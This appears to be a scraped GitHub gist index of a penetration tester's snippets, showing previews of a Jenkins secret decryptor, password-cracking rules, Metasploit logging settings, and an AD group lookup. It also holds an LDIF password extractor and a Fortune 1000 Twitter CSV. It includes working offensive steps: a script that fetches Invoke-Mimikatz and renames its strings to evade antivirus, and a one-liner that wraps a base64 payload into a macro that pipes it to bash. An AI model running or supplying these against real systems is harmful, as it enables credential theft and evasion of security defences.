View decrypt_jenkins2.rb
#!/usr/bin/env ruby
require 'base64'
require 'digest'
require 'openssl'
# Author: @thesubtlety
# Decrypts Jenkins 2 encrypted strings, code change introduced around Jenkins ver 2.44
# Based off work by juyeong, https://gist.github.com/juyeong/081379bd1ddb3754ed51ab8b8e535f7c
View custom_john.conf
[List.Rules:Try]
cAz"[0-9]"
cAz"[£!$@#-=_]"
cAz"[0-9][0-9]"
cAz"[0-9][£!$@#-=_]"
cAz"[£!$@#-=_][0-9]"
cAz"[0-9][0-9][0-9]"
cAz"[0-9][0-9][0-9][0-9]"
cA0"[0-9]"
cA0"[£!$@#-=_]"
View loggingprompt.md

In your ~/.msf directory, create a file msfconsole.rc

set ConsoleLogging true
set LogLevel 5
set SessionLogging true
set TimeStampOutput true
set PROMPT %T %L

For bash

thesubtlety / invoke_evasion.sh
Created May 16, 2018 — forked from PaulSec/invoke_evasion.sh
Small script to bypass AV that triggers Invoke-Mimikatz with shitty rules
# AV Bypass to run Mimikatz
# From: https://www.blackhillsinfosec.com/?p=5555
# Server side:
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
thesubtlety / katz.cs
Created Aug 1, 2018
Updated Katz.cs - Latest Mimikatz, I mean honestly it is 2018...
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
thesubtlety / macscriptify.sh
Created Aug 16, 2018
MacScriptify bash oneliner
# save oneliner as macscript.txt
f=macscript.txt; echo "Dim s As String\n"; for each in $(base64 -w0 <<< "$(cat "$f")" | fold -w 90); do echo "s = s + \"$each\""; done | sed '0,/\ s\ \+/{s/\ \+//}'; echo 'MacScript "do shell script "" echo " & s & " | base64 -D | bash "" "'; echo 'End Sub'
thesubtlety / Fortune-1000-Company-Twitter-Accounts.csv
Created Sep 18, 2018 — forked from mbejda/Fortune-1000-Company-Twitter-Accounts.csv
Fortune 1000 companies Twitter Accounts. Twitter, domain, keywords, and description
domain,name,keywords,description,twitter
walmartstores.com,Wal-Mart Stores,"SEC filing,Walmart photos,walmart stock,sustainability index,Wal-Mart,walmart annual reports,Walmart responsibility,executive speeches,walmart suppliers,global responsibility,walmart global sustainability report,walmart investors,Walmart interactive map,walmart history,privacy policy,financial reports,walmart news,Wal Mart,walmart sustainability,Walmart locations,Walmart videos,walmart story,Walmart,Walmart stores,walmart board of directors,community giving,walmart careers,Walmart jobs,sam walton","Find Walmart executive speeches, financial reports, press releases, downloadable photos and videos, and see an interactive map of our locations around the world.",walmart
gm.com,General Motors,,"General Motors is home to Buick, Cadillac, GMC and Chevrolet. Find the latest news about GM automotive innovations, investor relations and more. ",GM
ge.com,General Electric,,,generalelectric
chevron.com,ChevronTexaco,"cvx, chevrontexaco, cheveron,
thesubtlety / sans-sec660-recommended-reading.md
Created Jan 5, 2019
SANS SEC660 GXPN Recommended Reading
thesubtlety / Get-GroupsRec.ps1
Created Jan 23, 2019
Get all AD group membership recursively (requires AD module)
function Get-GroupsRec {
    [CmdletBinding()]
    param
    (
        [Parameter(Mandatory)]
        [string]$User
    )
    $dn = (Get-ADUser $User).DistinguishedName
    # 1.2.840.113556.1.4.1941 is LDAP_MATCHING_RULE_IN_CHAIN, which resolves nested group membership
    Get-ADGroup -LDAPFilter ("(member:1.2.840.113556.1.4.1941:={0})" -f $dn) | Select-Object -ExpandProperty Name | Sort-Object
}
thesubtlety / parse_ldif_file.py
Created Apr 10, 2019
Parse an ldif file extracting the userPassword field
#!/usr/bin/env python
# pip install python-ldap
import sys, ldif

def main():
    if len(sys.argv) != 3:
        # Format the usage string before printing so this works on Python 2 and 3
        print("Usage: %s <ldif_dump.ldif> <outfile>" % sys.argv[0])
        sys.exit(-1)
    ldif_file = sys.argv[1]